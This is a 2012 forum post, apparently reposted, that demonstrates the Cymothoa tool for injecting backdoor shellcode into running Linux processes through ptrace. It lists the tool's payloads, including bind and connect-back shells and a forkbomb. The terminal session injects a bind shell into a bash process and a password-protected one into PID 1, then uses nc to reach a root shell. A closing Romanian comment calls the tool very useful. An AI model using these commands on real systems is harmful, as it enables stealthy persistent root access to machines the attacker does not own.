co4ie Posted January 17, 2012 Report Posted January 17, 2012 Inject Backdoor’s Shellcode Into An Existing ProcessCymothoa is a stealth backdooring tool, that injects backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S0 - bind /bin/sh to the provided port (requires -y)1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>2 - bind /bin/sh to tcp port with password authentication (requires -y -o)3 - /bin/sh connect back (requires -x, -y)4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)5 - script execution (requires -i -c), creates a tmp file in the process dir you must remove6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com8 - forkbomb (just for fun...) - Kris Katterjohn9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)root@Dis9Team:/pentest/backdoors/cymothoa#find /bin/bash pidroot@Dis9Team:/pentest/backdoors/cymothoa# ps aux | grep /bin/bashroot 1236 0.0 0.2 4280 1376 tty1 S+ 09:22 0:00 /bin/bash /usr/bin/startxroot 1506 0.1 0.3 4648 1932 pts/1 S 09:22 0:00 /bin/bashroot 1554 0.0 0.1 3376 744 pts/1 S+ 09:26 0:00 grep --color=auto /bin/bashpid = 1506root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1506 -s 0 -y 10086[+] attaching to process 1506 register info: ----------------------------------------------------------- eax value: 0xfffffe00 ebx value: 0xffffffff esp value: 0xbf940ae4 eip value: 0xb7818422 ------------------------------------------------------------[+] new esp: 0xbf940ae0[+] injecting code into 0xb7819000[+] copy general purpose registers[+] detaching from 1506[+] infected!!!root@Dis9Team:/pentest/backdoors/cymothoa#-s = 0 Payloads = 0 – bind /bin/sh to the provided port (requires -y)root@Dis9Team:/pentest/backdoors/cymothoa# nmap -p 10086 127.0.0.1Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-23 09:29 CSTNmap scan report for localhost (127.0.0.1)Host is up (0.00062s latency).PORT STATE SERVICE10086/tcp open unknownNmap done: 1 IP address (1 host up) scanned in 0.13 secondsroot@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 10086iduid=0(root) gid=0(root) groups=0(root)pwd/pentest/backdoors/cymothoanext Payloads = 2 – bind /bin/sh to tcp port with password authentication (requires -y -o)root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1 -s 2 -y 1002 -o 123456[+] attaching to process 1 register info: ----------------------------------------------------------- eax value: 0xfffffdfe ebx value: 0xa esp value: 0xbfc0240c eip value: 0xb7856422 ------------------------------------------------------------[+] new esp: 0xbfc02408[+] injecting code into 0xb7857000[+] copy general purpose registers[+] detaching from 1[+] infected!!!root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 1002Password: 123456Un Tool foarte util ... simplu si la obiect !!Sursa Quote